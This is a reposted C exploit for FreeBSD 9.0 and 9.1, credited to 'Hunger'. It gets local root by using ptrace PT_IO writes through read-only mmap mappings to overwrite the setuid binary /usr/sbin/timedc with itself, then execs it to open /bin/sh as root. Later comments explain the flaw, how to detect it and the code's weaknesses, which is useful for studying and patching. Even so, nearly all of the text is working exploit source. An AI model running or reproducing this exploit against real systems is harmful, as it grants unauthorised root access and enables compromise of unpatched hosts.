FreeBSD 9.0 / 9.1 mmap/ptrace Exploit
来源:fbsd9lul@hunger.hu 作者:Hunger 发布时间:2013-06-20  
/*
 * FreeBSD 9.{0,1} mmap/ptrace exploit
 * by Hunger <fbsd9lul@hunger.hu>
 *
 * Happy Birthday FreeBSD!
 * Now you are 20 years old and your security is the same as 20 years ago... :)
 *
 * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
 *              sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
 *                      I hope we'll meet again at 8@1470n ;)
 *
 * Special thanks to proactivesec.com
 *
 */

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

/*
 * Entry point.  Two modes, chosen by geteuid():
 *   - euid 0: the process is already privileged (the re-executed copy),
 *     so it calls setuid(0) and execs SH.
 *   - otherwise: it maps its own image (av[0]) and the setuid target TG,
 *     forks a child to trace, and issues a single PT_IO PIOD_WRITE_D whose
 *     source is the av[0] mapping and whose destination is the TG mapping,
 *     then execs TG.
 *
 * Defender's reading: every mapping here is PROT_READ over a file opened
 * O_RDONLY, so the PT_IO write is only useful if the kernel fails to apply
 * the mapping's protection on the ptrace write path.  On a kernel where
 * that check is enforced the ptrace(PT_IO) call should presumably fail and
 * the program stops at err(8, "ptio") with nothing modified — confirm
 * against the vendor fix for this issue.  A process that PT_ATTACHes to a
 * child of its own and then execs a setuid binary is the observable
 * pattern; ptrace/audit logging of PT_IO against setuid executables is
 * where detection lives.
 *
 * Notes on the code as written: `ac` is never used; return values of
 * setuid() and execl() are not checked; neither file descriptor nor mapping
 * is released on any path (the process is expected to exec or die).
 */
int
main(int ac, char **av) {
   int from_fd, to_fd, status;
   struct stat st;
   struct ptrace_io_desc piod;
   char *s, *d;   /* s: mapping of av[0] (source), d: mapping of TG (destination) */
   pid_t pid;

   /* Privileged re-entry: the re-executed copy drops straight into a shell. */
   if (geteuid() == 0)  {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;   /* reached only if execl() failed; errno is not reported */
   }

   printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
   printf("by Hunger <fbsd9lul@hunger.hu>\n");

   /* Both files are opened read-only; TG is the setuid target named above. */
   if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");

   /* Only av[0] is stat()ed: its size drives BOTH mappings and the PT_IO length. */
   if (stat(av[0], &st) == -1)
        err(2, "stat");

   /*
    * Two PROT_READ, MAP_SHARED mappings; the TG mapping additionally sets
    * MAP_NOSYNC.  Neither mapping is writable by the process itself.
    */
   if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

   if ((pid = fork()) == -1)
        err(4, "fork");

   /* Child: request tracing by the parent, then exit immediately. */
   if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                err(5, "ptraceme");

        return 0;
        }

   /* Parent: attach to the child and wait for its next state change. */
   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

   if (wait(&status) == -1)
        err(7, "wait");

   /*
    * One PT_IO request: write st.st_size bytes from the av[0] mapping (s)
    * to the address of the TG mapping (d) in the traced child.  This is the
    * step a correctly protection-checking kernel is expected to reject.
    */
   piod.piod_op = PIOD_WRITE_D;
   piod.piod_offs = d;
   piod.piod_addr = s;
   piod.piod_len  = st.st_size;

   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

   /* Exec the target; on success the euid-0 branch at the top runs. */
   execl(TG, TG, NULL);

   return 0;   /* execl() failure is silently ignored */
}

 